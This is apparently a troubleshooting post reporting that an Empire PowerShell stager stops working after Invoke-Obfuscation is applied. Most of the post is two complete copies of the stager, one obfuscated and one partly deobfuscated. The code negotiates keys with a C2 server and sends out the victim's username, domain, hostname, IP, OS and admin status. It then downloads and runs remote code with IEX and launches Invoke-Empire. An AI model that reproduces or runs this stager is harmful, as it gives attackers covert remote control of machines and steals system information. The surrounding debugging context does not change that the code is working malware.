After obfuscation, the Empire stager no longer executes properly. I am able to correct this by disabling the string TOKEN, member TOKEN levels 3 and 4, and command TOKEN obfuscation types. My hunch is that it all traces back to something in the string TOKEN obfuscation.
.("{0}{2}{1}" -f 'SE','iTeM','t-') ("VARiaBL"+"e:0F"+"4G"+"v5") ([tyPE]("{3}{2}{1}{0}{4}"-F '.aS','cTiOn','Fle','Re','semBly') ) ; .("{0}{2}{1}" -f 'S','ITeM','eT-') ("vARia"+"B"+"Le:"+"UR2H"+"cI") ( [typE]("{5}{0}{3}{1}{4}{2}"-f 'E','O','ng','NC','DI','SysTEm.tExt.')) ; $01aW = [tYPE]("{0}{9}{10}{7}{8}{3}{4}{6}{1}{5}{2}"-f'SYsT','O','Rflags','A','p','VidE','HY.cspPr','Y.Cr','YpTOGr','em.se','curiT'); .("{2}{1}{0}" -f 'M','ITe','sEt-') ("vaRIAbl"+"e:9"+"d"+"2o"+"4") ([TYpe]("{1}{2}{0}{4}{3}" -f'br','SYstem.NE','T.WE','Uest','EQ') ) ; &('sv') ("{1}{0}" -f'jg0','H') ([tYPe]("{3}{7}{5}{0}{2}{6}{1}{4}" -F'.','NTIaLca','N','sy','CHe','TEm','et.CREde','S') ); &('SV') ('l3vo'+'jy') ([type]("{2}{0}{1}"-F'rOnm','enT','enVI') ); .("{0}{1}"-f 'Set-IT','Em') ("VARi"+"abl"+"E:15Ju"+"0h") ( [TypE]("{5}{2}{4}{7}{1}{8}{0}{3}{6}" -F'oW','p','u','sIDE','r','SEc','Ntity','ity.PRinci','Al.wind') ) ; &("{1}{0}{3}{2}"-f '-vA','sEt','e','RIAbL') ('Aopkq'+'U') ( [tYpE]("{2}{0}{3}{4}{1}"-F'STEM.DIAGNo','ESs','sY','StICS.p','RoC') ); &('sV') ('dM0o'+'8J') ( [tYpe]("{0}{2}{1}"-F'biT','nveRtER','co') ) ; $t9j5= [tYPe]('GC') ; fUnCtiON START`-`NeGO`Ti`Ate {pArAm(${S},${Sk},${uA}=("{3}{2}{6}{11}{1}{9}{7}{8}{10}{0}{5}{12}{4}"-f'; ','nDows NT ','oZIlLA/','M',' GeCKo','r','5.','1; W','OW64; TrI','6.','DENt/7.0','0 (WI','V:11.0) LiKe'))fUNctiON C`oN`Ve`RtTo-rC`4B`ytEs`TrEAm {PaRaM (${R`CK}, ${i`N})begIN {[BytE[]] ${s} = 0..255;${J} = 0;0..255 | .("{0}{1}{3}{2}"-f'FoRE','aCH','ct','-OBje') {${J} = (${j} + ${s}[${_}] + ${R`cK}[${_} % ${R`CK}."l`eNg`TH"]) % 256;${S}[${_}], ${s}[${J}] = ${S}[${J}], ${S}[${_}];};${i} = ${j} = 0;}pROcEsS {FOREACh(${bY`Te} in ${in}) {${I} = (${i} + 1) % 256;${J} = (${j} + ${s}[${i}]) % 256;${s}[${I}], ${S}[${J}] = ${s}[${J}], ${s}[${i}];${by`Te} -Bxor ${S}[(${s}[${i}] + ${s}[${J}]) % 256];}}}fUnCtIOn decr`Ypt-b`Y`Tes {PaRam (${K`ey}, ${In})if(${I`N}."leNG`Th" -Gt 32) {${H`Mac} = &("{2}{1}{0}"-f 't','-ObjeC','New') ("{0}{7}{5}{4}{8}{2}{1}{3}{6}" 
-f'Sy','S','PHy.HMAC','H','RypTOG','C','A256','StEm.SEcurITY.','ra');${E}= ( &("{0}{1}"-f'G','ci') ('vAriabLe:'+'Ur'+'2'+'hci') )."v`AluE"::"As`cii";${m`Ac} = ${I`N}[-10..-1];${i`N} = ${In}[0..(${IN}."len`GTh" - 11)];${h`MAC}."K`ey" = ${E}.("{1}{0}"-f's','GEtBYtE').Invoke(${K`ey});${eX`pEc`TeD} = ${Hm`AC}.("{2}{0}{1}" -f 'MPUTE','HAsH','CO').Invoke(${iN})[0..9];if (@(.("{3}{0}{2}{1}"-f'Pa','T','Re-OBJEc','COm') ${m`AC} ${Exp`e`CtEd} -SYNC 0)."LEn`g`TH" -ne 0) {rEturN;}${i`V} = ${In}[0..15];${A`ES} = .("{0}{1}{2}" -f 'NEw-Ob','Je','CT') ("{8}{10}{11}{0}{6}{2}{14}{5}{1}{13}{4}{7}{9}{12}{3}"-f'I','y','y','vIDEr','RapHy.AESCrypT','R','t','O','SYsT','SerVIC','eM','.SEcUr','EPrO','ptog','.C');${A`eS}."m`odE" = "CBC";${A`eS}."k`eY" = ${e}.("{0}{2}{1}"-f 'Get','es','ByT').Invoke(${K`ey});${A`Es}."Iv" = ${I`V};(${A`ES}.("{1}{0}{2}{3}" -f 'EATe','Cr','DEcRYP','TOR').Invoke())."tR`AN`SFOrmfInalbl`O`cK"((${iN}[16..${i`N}."lE`NGTH"]), 0, ${in}."le`NgTH"-16)}}${Nu`lL} = $0F4Gv5::("{3}{2}{4}{1}{0}{5}"-f'Na','tial','thP','LoadWi','ar','me').Invoke(("{0}{1}{2}"-f 'S','ystem.Secur','ity'));${nU`LL} = ( &("{2}{0}{3}{1}" -f 'ARIAb','e','get-v','L') ('0f4GV'+'5') -VAluEO )::("{1}{4}{0}{3}{2}" -f'a','LoadWit','alName','rti','hP').Invoke(("{2}{1}{3}{0}"-f'ore','stem','Sy','.C'));${erroRAcTi`O`NPr`efER`EncE} = ("{1}{3}{0}{2}{4}"-f 'C','Si','ont','lently','inue');${E}= ( .("{1}{0}" -f'EM','it') ("VarIa"+"b"+"LE:"+"uR2h"+"Ci") )."V`ALUE"::"aSc`iI";${c`U`sToM`HE`AdErS} = "";${S`kb}=${e}.("{0}{1}" -f'G','etBYTeS').Invoke(${S`k});${A`ES}=&("{0}{1}{3}{2}"-f'N','eW-','EcT','OBj') ("{0}{6}{9}{10}{2}{1}{5}{4}{7}{8}{3}" -f 'S','Pto','ry','R','Ovi','SErvICEPR','YSTEm.SeCuRI','D','e','ty.CryPtogRAp','Hy.AeSC');${I`V} = [Byte] 0..255 | .("{2}{1}{0}" -f'om','AnD','GeT-R') -COunT 16;${A`ES}."Mo`De"="CBC";${A`Es}."K`eY"=${S`kB};${A`es}."I`V" = ${i`V};${hM`AC} = &("{2}{1}{0}" -f 'JeCt','B','New-O') 
("{1}{6}{9}{2}{8}{3}{0}{4}{10}{5}{7}{11}"-f'Ty.CR','S','.Se','uRi','Yptogr','y.HMA','yS','CSH','C','tEM','aph','A256');${HM`Ac}."k`ey" = ${S`KB};${c`Sp} = &("{0}{1}{2}{3}"-f 'NE','w','-Obje','ct') ("{2}{0}{5}{4}{1}{3}{6}" -f 'sTEm.S','CSPPARame','Sy','tEr','APhY.','ECUrity.CRyPTOgr','s');${C`sp}."fLa`gs" = ${C`SP}."FL`Ags" -Bor (.("{2}{0}{1}"-f 'iABl','E','VAR') ("{0}{1}"-f '0','1AW') )."v`ALUe"::"USE`maC`Hi`N`EKEYsTORe";${Rs} = .("{2}{0}{1}"-f 'W-O','BjeCT','Ne') ("{15}{9}{14}{10}{7}{6}{8}{12}{5}{3}{11}{0}{4}{1}{13}{2}"-f'O','OViD','r','RY','SERVIcEPR','Y.RSAC','RiTY','u','.CryP','Em.','C','pT','TOgrAPh','e','SE','SYsT') -ARGuMeNtLISt 2048,${C`sp};${R`K}=${r`S}.("{1}{0}{3}{2}"-f 'Tri','TOXmLS','g','n').Invoke(${fa`lsE});${I`D}=-join(("{0}{5}{8}{7}{3}{9}{1}{2}{4}{6}"-f 'AB','12','3456','ST','7','CD','89','NPR','EFGHKLM','UVWXYZ').("{0}{2}{3}{1}"-f'T','rray','oC','harA').Invoke()|.("{0}{2}{1}" -f 'Get-Ran','m','do') -Count 8);${i`B}=${E}.("{1}{2}{0}"-f'S','GET','byTe').Invoke(${r`k});${e`B}=${i`V}+${a`ES}.("{1}{0}{2}{3}"-f'eATEENcRy','Cr','Pt','OR').Invoke().("{4}{3}{1}{5}{0}{2}" -f'OC','rMFInALB','K','ANsFo','TR','l').Invoke(${i`B},0,${i`B}."LENG`TH");${eb}=${e`B}+${hM`Ac}.("{2}{0}{3}{1}"-f'MP','H','CO','UTeHAS').Invoke(${e`B})[0..9];If(-Not ${WC}) {${w`C}=&("{1}{2}{0}"-f'cT','Ne','W-ObJE') ("{2}{1}{0}{3}" -f'.Ne','Em','SysT','t.WEbCLienT');${w`c}."PrO`xy" = ( .("{1}{0}" -f'r','Di') ("VariAbL"+"E:9"+"D"+"2o"+"4"))."V`ALUE"::("{1}{2}{3}{0}{4}" -f 'WEBPR','GE','TSYSTE','m','OXY').Invoke();${w`c}."prO`Xy"."cr`e`DENTi`ALS" = ( &("{1}{0}" -f 'cI','g') ("{1}{0}{3}{2}" -f 'aRiAbL','v','Hjg0','E:') )."V`AluE"::"D`efa`ul`TCREDeNtiA`ls";}if (${Cu`StoM`Head`eRS} -ne "") {${hE`AdErS} = ${cu`St`OMHeA`DERS} -split ',';${hE`Ad`erS} | &("{2}{4}{3}{1}{0}"-f 't','bjEC','FOREaC','-O','h') {${hE`A`DERKeY} = ${_}.("{1}{0}" -f 'pLIT','S').Invoke(':')[0];${h`EaDErva`lUE} = ${_}.("{1}{0}"-f 't','splI').Invoke(':')[1];${W`C}."H`EADE`RS".("{1}{0}"-f 'd','AD').Invoke(${h`eAdeR`kEY}, 
${hE`ADERVA`L`ue});}}${w`c}."HE`ADeRS".("{1}{0}" -f 'dd','A').Invoke(("{2}{1}{0}"-f 'nt','ge','User-A'),${uA});${iv}= (&("{0}{1}"-f'GC','I') ('VaRI'+'ABle'+':Dm0o'+'8j'))."vaL`Ue"::("{1}{2}{0}" -f 'ES','GetBY','T').Invoke($(&("{0}{1}{2}"-f'GEt-','R','aNdom')));${DA`Ta} = ${E}.("{2}{1}{0}" -f 's','etBytE','g').Invoke(${I`d}) + @(0x01,0x02,0X00,0x00) + $dm0O8J::("{1}{2}{0}"-f 's','GeT','BYtE').Invoke(${EB}."LEnG`TH");${R`c4P} = .("{1}{3}{0}{4}{2}"-f'ytES','CoNVERtTo-R','M','C4B','trEa') -RCK $(${Iv}+${s`kb}) -IN ${da`TA};${R`c4p} = ${iV} + ${rC`4p} + ${eb};${R`AW}=${wc}.("{1}{0}{2}" -f 'loadDat','Up','a').Invoke(${s}+("{2}{1}{0}{3}"-f't','admin/ge','/','.php'),("{0}{1}" -f'P','OST'),${rC`4p});${DE}=${e}.("{0}{2}{1}" -f 'GEt','inG','STR').Invoke(${r`S}.("{0}{1}" -f'D','EcrypT').Invoke(${r`AW},${F`AlSE}));${n`O`NCE}=${d`E}[0..15] -JoiN '';${k`EY}=${D`E}[16..${DE}."LeNg`TH"] -jOin '';${nOn`cE}=[StRiNg]([lonG]${N`O`NcE} + 1);${A`ES}=&("{1}{0}{2}" -f'EW-O','N','BJECt') ("{11}{0}{6}{8}{3}{4}{5}{2}{7}{9}{10}{1}" -f 'Tem','oVIDeR','Ser','Ity.CryPtOgraPHy.AeS','C','ryptO','.','v','SEcur','i','CEPr','SYS');${IV} = [ByTE] 0..255 | .("{0}{2}{1}" -f 'GeT-RA','dOM','N') -CoUNt 16;${a`es}."mO`De"="CBC";${A`ES}."k`ey"=${E}.("{2}{0}{1}" -f 'Byte','s','GET').Invoke(${K`Ey});${A`es}."iv" = ${IV};${I}=${nOn`cE}+'|'+${s}+'|'+ $l3VojY::"U`SERD`omAi`NNaMe"+'|'+ $L3vOjy::"UsER`NaME"+'|'+ (.("{0}{2}{1}"-f 'VARIab','e','l') ("{1}{0}{2}" -f'v','l3','oJY') -VaL )::"m`ACHiNenA`me";${P}=(&("{1}{0}"-f'mI','gw') ("{9}{2}{7}{0}{6}{5}{1}{8}{3}{4}"-f'or','g','N','rATI','On','OnfI','KAdapteRC','32_Netw','u','WI')|&("{1}{0}" -f'HEre','W'){${_}."IPA`Ddr`Ess"}|&("{1}{0}{2}"-f'e','S','lect') -EXpand ("{0}{2}{1}"-f 'IPAd','REss','D'));${I`p} = @{${Tr`uE}=${p}[0];${F`AlsE}=${p}}[${p}."l`ength" -lT 6];if(!${I`p} -or ${I`P}.("{1}{0}"-f 'iM','tR').Invoke() -Eq '') {${I`p}=("{0}{1}" -f '0.0.0','.0')};${I}+="|$ip";${i}+='|'+(.("{1}{3}{0}{2}" -f'bjE','GeT-WM','cT','iO') ("{5}{4}{0}{3}{1}{2}"-f 
'Ng','y','sTEm','S','ATi','Win32_OpEr'))."na`ME".("{0}{1}" -f'S','pLIt').Invoke('|')[0];if(( $l3vojy::"USe`Rn`AME").("{1}{0}" -f 'r','ToLowe').Invoke() -eq ("{2}{0}{1}" -f 'y','stem','s')){${i}+=(('n48True') -CRepLACe ([CHAR]110+[CHAR]52+[CHAR]56),[CHAR]124)}else {${I} += '|' +([Security.Principal.WindowsPrincipal] $15JU0H::("{1}{2}{3}{0}"-f'rrent','Get','C','u').Invoke())."isiNr`o`le"([Security.Principal.WindowsBuiltInRole] ("{3}{1}{0}{2}"-f 'nistrat','dmi','or','A'))}${N}= $AoPkqu::("{3}{0}{1}{2}"-f'U','RRENtPrOce','sS','GeTC').Invoke();${I}+='|'+${n}."PROC`e`Ssn`Ame"+'|'+${n}."Id";${I} += (("{4}{2}{0}{1}{3}"-f'h','e','owers','llJxY','JxYp'))."r`EpL`ACE"(([ChAr]74+[ChAr]120+[ChAr]89),[StRIng][ChAr]124) + ${P`s`VER`SionTAbLe}."Psver`s`ION"."M`AjoR";${I`B2}=${e}.("{2}{1}{0}"-f's','ETByTE','g').Invoke(${I});${e`B2}=${i`V}+${a`es}.("{0}{2}{3}{4}{1}"-f'Creat','pTor','eENC','R','y').Invoke().("{0}{3}{4}{1}{2}"-f'T','A','LBLoCK','RA','NsformFIn').Invoke(${I`B2},0,${i`B2}."Le`Ngth");${H`maC}."k`Ey" = ${E}.("{1}{2}{0}" -f'S','GeTByt','e').Invoke(${K`ey});${E`B2} = ${E`B2}+${h`MAC}.("{1}{0}{2}{3}" -f 'p','COm','UTEHA','SH').Invoke(${e`B2})[0..9];${I`V2}= ( &('gi') ("{3}{2}{0}{4}{1}"-f 'Le','8j','B','vAria',':dm0o') )."vA`LUe"::("{1}{0}{2}" -f 'TBYtE','GE','S').Invoke($(.("{3}{2}{0}{1}" -f'Do','m','N','GET-RA')));${Da`T`A2} = ${E}.("{0}{1}" -f'GeTbyt','ES').Invoke(${I`D}) + @(0x01,0x03,0x00,0x00) + ( &("{1}{0}"-f 'Le','VarIAB') ('dm0o'+'8J') )."va`luE"::("{0}{2}{1}"-f 'GeTBy','eS','T').Invoke(${E`B2}."lEn`G`TH");${R`c4P2} = .("{4}{1}{2}{3}{6}{0}{5}" -f '-RC4BYTESt','o','nvER','T','C','reaM','To') -RCK $(${i`V2}+${S`kb}) -IN ${d`A`TA2};${R`c4`P2} = ${i`V2} + ${R`c4p2} + ${E`B2};if (${Cus`TomHe`Aders} -ne "") {${he`ADeRs} = ${C`UsT`Om`HEAdERS} -SplIT ',';${H`eAde`RS} | &("{1}{4}{2}{0}{3}"-f 'J','FOr','-OB','ECT','EACh') {${he`Ad`eRkeY} = ${_}.("{1}{0}"-f 'LIT','SP').Invoke(':')[0];${H`EaDer`ValUe} = ${_}.("{0}{1}" -f 's','PLit').Invoke(':')[1];${wC}."hEa`deRs".("{1}{0}" 
-f'd','Ad').Invoke(${hEADer`K`ey}, ${hEADe`RV`ALue});}}${wC}."HE`ADe`Rs".("{0}{1}" -f 'Ad','d').Invoke(("{2}{0}{1}"-f'gen','t','User-A'),${u`A});${R`Aw}=${W`c}.("{1}{0}{2}{3}" -f'lo','Up','adD','ata').Invoke(${S}+("{1}{0}"-f'news.php','/'),("{0}{1}" -f 'PO','ST'),${r`C`4p2});.("{1}{0}"-f 'X','IE') $( ${e}.("{3}{1}{0}{2}"-f 'Str','ET','Ing','G').Invoke($(.("{2}{3}{1}{0}" -f'Es','T','DEcRY','pT-BY') -KEY ${k`Ey} -In ${R`AW})) );${a`ES}=${N`uLl};${s2}=${NU`Ll};${W`C}=${Nu`lL};${e`B2}=${n`Ull};${R`Aw}=${nU`Ll};${Iv}=${NU`lL};${W`c}=${NU`lL};${I}=${n`ull};${i`B2}=${Nu`LL}; (&("{0}{1}" -f'd','Ir') ('va'+'RIAB'+'Le:t9'+'J'+'5'))."VA`LUE"::("{1}{0}" -f 'olLEcT','C').Invoke();&("{1}{2}{3}{0}" -f'e','Invoke-E','m','pir') -Servers @((${S} -split "/")[0..2] -join "/") -StagingKey ${sK} -SessionKey ${K`Ey} -SessionID ${iD};}&("{4}{1}{3}{0}{2}" -f'go','art','tiate','-Ne','St') -s "$ser" -SK ("{0}{8}{2}{1}{7}{6}{3}{4}{5}" -f'3c6e0b8a9c15','a','28b9','15','3','1d','ca','98','224a82') -UA ${u};
set-ItEM ('v'+'arIab'+'le:9ernQ'+'0') ( [TYpe]("{1}{5}{3}{0}{2}{6}{4}" -F'ctI','R','ON.Asse','FlE','ly','E','Mb')) ; seT-vArIaBle ("{0}{1}"-f'j','N4Ba') ([tyPE]("{3}{1}{0}{2}" -F'ExT.eNcODI','eM.t','Ng','SYSt') ) ; SET ("{1}{0}" -f 'Z','O8Lb') ( [tYPE]("{3}{8}{4}{7}{6}{0}{2}{1}{9}{5}" -F 'oGR','y.CSPPr','apH','SYsTEm.se','Y.','S','RypT','c','CUriT','ovIdeRFlAG') ) ;sEt-vARiablE ("{0}{1}" -f'3E1','S') ( [tyPe]("{0}{1}{3}{2}{4}" -f 'SyStEM.N','ET','web','.','REqueST') ) ; ${9`Px} = [typE]("{3}{1}{0}{4}{2}"-f're','TEM.nET.c','EnTiALcaCHE','sys','d') ; sET-VariabLe ("{0}{1}"-f '2','kU9AV') ( [TyPE]("{1}{2}{0}" -F 'nMeNT','EN','vIRo')) ; SEt-ITeM ("{2}{0}{1}" -f'iaBLE:52F','6Z4','VaR') ( [tYpE]("{8}{9}{1}{3}{0}{4}{5}{10}{7}{2}{6}"-f 'W','.','Tit','PrInCipal.','INdoW','si','Y','N','seCuR','Ity','De') ) ; sET-iTEM ('va'+'rI'+'ABle:R'+'SJ') ( [tYpE]("{0}{2}{4}{3}{1}{6}{5}"-f's','DIaGNo','ys','.','tEM','CESs','StiCs.pRO') ) ; set-iTeM ("vARiablE"+":H4"+"Y"+"sF") ( [type]("{0}{3}{2}{1}" -F'BI','ER','t','TCONveR') ) ; Sv ("{0}{1}"-f 'JC0','A') ( [tYpe]('gc') ) ;fUNcTiON sTarT`-`Ne`Go`TIATE {parAm(${s},${S`k},${U`A}='MoZilLA/5.0 (WIndOWS NT 6.1; WOW64; TrIDeNt/7.0; rv:11.0) LiKe GEcKo')FUnCTiON convE`Rtt`O-`Rc4b`yT`EsTre`AM {PaRaM (${r`cK}, ${IN})BegIn {[BYTe[]] ${S} = 0..255;${j} = 0;0..255 | FOREAcH-OBjecT {${J} = (${j} + ${s}[${_}] + ${r`cK}[${_} % ${r`Ck}."LeN`g`TH"]) % 256;${s}[${_}], ${S}[${J}] = ${S}[${J}], ${s}[${_}];};${I} = ${j} = 0;}pRocEsS {ForEacH(${BY`Te} in ${I`N}) {${i} = (${I} + 1) % 256;${J} = (${j} + ${S}[${i}]) % 256;${s}[${i}], ${S}[${j}] = ${s}[${J}], ${S}[${i}];${By`Te} -BXOR ${S}[(${S}[${i}] + ${S}[${j}]) % 256];}}}FunctIoN dEcryp`T-`BytES {Param (${K`ey}, ${IN})IF(${i`N}."LENG`TH" -Gt 32) {${hM`AC} = NEw-ObJect ("{3}{10}{4}{0}{8}{1}{2}{9}{5}{7}{11}{6}" -f'eC','Rity.CryptoGRAP','h','Sy','em.S','.HM','6','A','U','Y','ST','CSHA25');${E}= ( GeT-VARIAblE ("{0}{1}"-f'jn','4Ba') )."Va`lUe"::"as`CiI";${m`Ac} = ${I`N}[-10..-1];${I`N} = 
${I`N}[0..(${IN}."LeNg`Th" - 11)];${hm`Ac}."K`EY" = ${e}."g`e`TbYtES"(${k`EY});${exPec`T`eD} = ${HM`Ac}."cOMPu`T`EHASh"(${i`N})[0..9];IF (@(COMpARe-ObJect ${m`Ac} ${E`XPE`cTED} -SYnc 0)."lE`Ngth" -nE 0) {rETURN;}${I`V} = ${In}[0..15];${a`es} = NeW-OBJect ("{6}{10}{12}{5}{2}{11}{1}{9}{7}{8}{0}{4}{3}"-f'E','.AEsC','Ty.CrYP','iDEr','ProV','Ri','SYs','OSErV','IC','RYPT','tEm','toGRApHy','.SEcu');${a`Es}."m`oDe" = "CBC";${A`ES}."K`eY" = ${E}."gEt`B`YTeS"(${K`EY});${a`es}."I`V" = ${I`V};(${a`Es}."creat`e`DE`CRYpTOR"())."traNsFor`mF`InALBL`OCK"((${IN}[16..${in}."LEN`G`Th"]), 0, ${i`N}."LEng`Th"-16)}}${n`ULl} = ( gEt-item ("{2}{0}{3}{1}" -f 'BLe','Ernq0','varIA',':9'))."Val`ue"::"l`oaDWithPa`R`TIaLn`A`mE"("System.Security");${n`uLl} = ${9eR`N`Q0}::"Lo`A`dwItHp`A`RtiAlN`AMe"("System.Core");${ERroraC`Ti`o`NPr`e`FErENce} = "SilentlyContinue";${E}= ( varIable ("{0}{1}" -f 'JN4b','A') )."V`AluE"::"a`sCIi";${cu`STOm`H`eA`DERs} = "";${S`kb}=${e}."GE`TBY`TES"(${S`k});${a`ES}=NEw-ObjECT ("{4}{12}{15}{10}{7}{1}{8}{13}{11}{6}{3}{9}{2}{14}{0}{5}"-f 'd','r','ceP','V','Sy','er','ToSer','Y.C','Yptography.AEs','i','cURIT','p','st','Cry','ROvi','em.Se');${I`V} = [byTE] 0..255 | Get-RANDOM -cOUnt 16;${A`ES}."m`ODe"="CBC";${a`ES}."K`Ey"=${s`Kb};${a`eS}."iV" = ${Iv};${hM`Ac} = New-ObJECT ("{3}{2}{5}{7}{0}{6}{4}{1}"-f 'pT','CSHA256','YS','S','Aphy.HMA','tEm.S','OGR','ecurITY.CrY');${hM`AC}."K`Ey" = ${s`kb};${c`sP} = NEW-OBjECt ("{1}{7}{3}{0}{2}{5}{6}{4}{8}"-f'TY.Cr','Sy','Y','em.SeCuRI','Csp','p','toGRAphy.','st','ParamEtErs');${c`SP}."f`LaGs" = ${C`SP}."f`lagS" -BOR (gET-vAriable ("{0}{1}" -f'o8','Lbz') )."VA`LuE"::"u`SEma`ChIne`KEys`T`OrE";${rs} = NeW-OBjECT ("{13}{10}{7}{8}{3}{11}{6}{5}{14}{4}{0}{12}{1}{2}{9}"-f 'yPTOSErvi','Ovi','de','C','ACR','p','Y','C','URITY.','r','M.SE','r','cEPR','SYsTe','TogRAPHY.RS') -ARGUMentLIST 2048,${c`sP};${R`k}=${Rs}."T`o`xmLstrINg"(${fAL`SE});${i`D}=-join("ABCDEFGHKLMNPRSTUVWXYZ123456789"."tOC`h`ARaRR`AY"()|Get-Random -Count 
8);${I`B}=${E}."Ge`Tby`Tes"(${rK});${e`B}=${I`V}+${a`ES}."C`ReAtee`NCrYP`ToR"()."TRansFoR`Mfi`Na`lbLo`CK"(${Ib},0,${iB}."leNG`Th");${EB}=${e`B}+${H`mAc}."cOMpU`TEHa`sH"(${E`B})[0..9];if(-NoT ${WC}) {${Wc}=NeW-OBjeCt ("{4}{1}{2}{3}{0}"-f 'iEnt','YSTEM.N','Et.W','ebCl','S');${W`c}."P`ROxy" = (GEt-VaRIABLe ("{0}{1}" -f'3E1','s') -vAlu )::"Ge`TsysTEMWE`B`p`RO`XY"();${W`c}."pr`OXy"."cRED`enT`IALS" = ${9`Px}::"DeF`Au`ltCrE`DEN`TiaLs";}if (${C`u`Stom`heAders} -ne "") {${HE`A`dErs} = ${c`u`sT`OMHea`DErS} -SpLIt ',';${he`A`DERs} | FOREACH-OBjEcT {${HeA`DeR`KeY} = ${_}."s`PlIT"(':')[0];${he`Ad`eRvAl`ue} = ${_}."sPL`It"(':')[1];${wC}."HEA`d`eRS"."A`DD"(${hEAdEr`k`ey}, ${h`eADerv`ALUE});}}${WC}."He`ADErs"."A`dD"("User-Agent",${U`A});${Iv}= (gcI ("Va"+"Ri"+"aBLE:h4ys"+"F") )."vAl`UE"::"g`eTbyt`eS"($(GeT-RandOm));${d`Ata} = ${e}."gEtBY`TeS"(${i`d}) + @(0X01,0x02,0X00,0X00) + ( GeT-vARIAbLE ("{0}{1}" -f'H4y','sF') )."VAl`Ue"::"G`ETbYT`Es"(${EB}."L`ENgtH");${Rc`4P} = CONVertTO-RC4BYTeStrEam -RCK $(${IV}+${S`Kb}) -IN ${da`TA};${Rc`4P} = ${iv} + ${RC`4P} + ${E`B};${r`AW}=${wc}."UPLO`AddA`Ta"(${S}+"/news.php","POST",${RC`4P});${D`e}=${e}."gETsTR`ing"(${R`S}."DeCR`Ypt"(${r`AW},${fA`L`Se}));${nO`NCe}=${DE}[0..15] -JOiN '';${k`EY}=${D`E}[16..${dE}."lEn`G`Th"] -JoIn '';${NON`CE}=[String]([LONG]${n`o`NCe} + 1);${a`Es}=NEw-ObjeCt ("{9}{0}{3}{2}{10}{4}{5}{6}{8}{1}{7}"-f'T','ovID','cuRI','EM.SE','rApHy','.A','EsCrypToSERvIce','eR','PR','SYS','TY.CRypTog');${I`V} = [BYtE] 0..255 | Get-RANdOM -COuNT 16;${a`es}."Mo`De"="CBC";${a`es}."K`ey"=${E}."G`etbyTEs"(${k`Ey});${a`es}."iv" = ${i`V};${i}=${NO`N`cE}+'|'+${S}+'|'+ ( Dir ("{2}{3}{0}{1}"-f'iABlE:2KU9','av','va','R') )."v`ALue"::"usERdo`maI`N`NaMe"+'|'+ ( GCI ('vArIABL'+'E:2'+'k'+'U9aV') )."v`ALUe"::"US`Ern`AMe"+'|'+ ( VARiAbLe ("{0}{1}"-f'2','ku9aV') )."vA`lUE"::"MAch`iNen`A`ME";${p}=(gwMi ("{2}{5}{4}{6}{0}{1}{3}{7}"-f 'ra','Ti','WIN32_NeTWO','o','f','RKAdapTERCon','IGu','N')|WHeRE{${_}."I`padDRe`Ss"}|SeLECT -ExPAnD ("{1}{2}{0}"-f 
'S','IPADD','ReS'));${I`P} = @{${t`RUe}=${p}[0];${f`AlSE}=${P}}[${p}."LEng`TH" -Lt 6];iF(!${i`P} -or ${I`P}."t`Rim"() -Eq '') {${I`p}='0.0.0.0'};${i}+="|$ip";${i}+='|'+(GeT-WMIObjECT ("{3}{1}{0}{2}{4}" -f's','RATInGSy','te','WiN32_Ope','m'))."n`Ame"."SpL`it"('|')[0];if(( ( gET-vaRiAbLE ("{0}{1}" -f '2ku9','AV') -VALUEOnLy)::"uSE`RNA`Me")."t`O`LoweR"() -eq "system"){${I}+="|True"}else {${I} += '|' +([Security.Principal.WindowsPrincipal] ( GCI ("{4}{1}{0}{2}{3}" -f 'aBlE:5','i','2','F6Z4','vAr') )."va`lUe"::"GeTcUR`R`ENT"())."isiNr`O`le"([Security.Principal.WindowsBuiltInRole] "Administrator")}${N}= ${r`Sj}::"geT`c`uRren`Tp`ROCEsS"();${i}+='|'+${n}."PROCES`SnA`ME"+'|'+${n}."iD";${I} += "|powershell|" + ${PS`Ve`RsiOn`T`AbLE}."ps`Ve`RsIoN"."MaJ`OR";${I`B2}=${e}."ge`TBYt`es"(${I});${e`B2}=${I`V}+${A`es}."crE`AT`e`EnCrY`Ptor"()."T`R`AnSformFiNA`Lb`LOCK"(${i`B2},0,${i`B2}."L`eNgth");${hm`Ac}."k`ey" = ${E}."G`E`TByTes"(${k`EY});${E`B2} = ${E`B2}+${hM`Ac}."cOmpUT`E`HaSh"(${E`B2})[0..9];${I`V2}= ${h`4y`sF}::"G`etBYt`eS"($(Get-RaNDOM));${D`Ata2} = ${e}."GE`Tbyt`eS"(${i`d}) + @(0x01,0X03,0x00,0x00) + ( GET-vArIabLe ('H4y'+'SF') -Valueo )::"gE`T`ByTes"(${E`B2}."LE`N`GTh");${r`c4P2} = CoNvERTTO-RC4BYTEStrEam -RCK $(${I`V2}+${S`Kb}) -IN ${D`At`A2};${Rc`4p2} = ${I`V2} + ${r`C4`p2} + ${e`B2};if (${cU`sT`o`MheA`DErs} -ne "") {${Hea`DE`RS} = ${CUsto`mh`EAdERS} -SpLIT ',';${hea`derS} | ForEAcH-ObJECT {${HeA`Derk`EY} = ${_}."S`PLIt"(':')[0];${HeA`d`eRv`ALUE} = ${_}."s`Plit"(':')[1];${Wc}."HeaDE`RS"."A`dd"(${h`ea`d`eRKEY}, ${h`e`AD`eRVAlUe});}}${wC}."hE`A`derS"."a`Dd"("User-Agent",${U`A});${R`AW}=${W`C}."U`PL`oAddA`TA"(${s}+"/login/process.php","POST",${R`C4P2});IEX $( ${E}."gET`StrI`NG"($(DECRYpT-BYTes -KEy ${k`Ey} -In ${R`AW})) );${a`es}=${Nu`LL};${s2}=${N`ULL};${WC}=${N`ull};${E`B2}=${NU`ll};${R`AW}=${N`uLl};${iv}=${nu`LL};${W`c}=${n`ull};${i}=${nU`ll};${i`B2}=${N`Ull}; ( geT-vaRIaBLe ("{1}{0}"-f 'c0A','j'))."VAL`ue"::"cO`Ll`eCt"();Invoke-Empire -Servers @((${S} -split "/")[0..2] 
-join "/") -StagingKey ${SK} -SessionKey ${K`Ey} -SessionID ${i`D};}Start-Negotiate -s "$ser" -SK '3c6e0b8a9c15224a8228b9a98ca1531d' -UA ${U};
I'll be doing some more research into this and will see if I can get you more output from the obfuscated script while it is actually executing. I thought I would go ahead and post now in case anything stands out to you.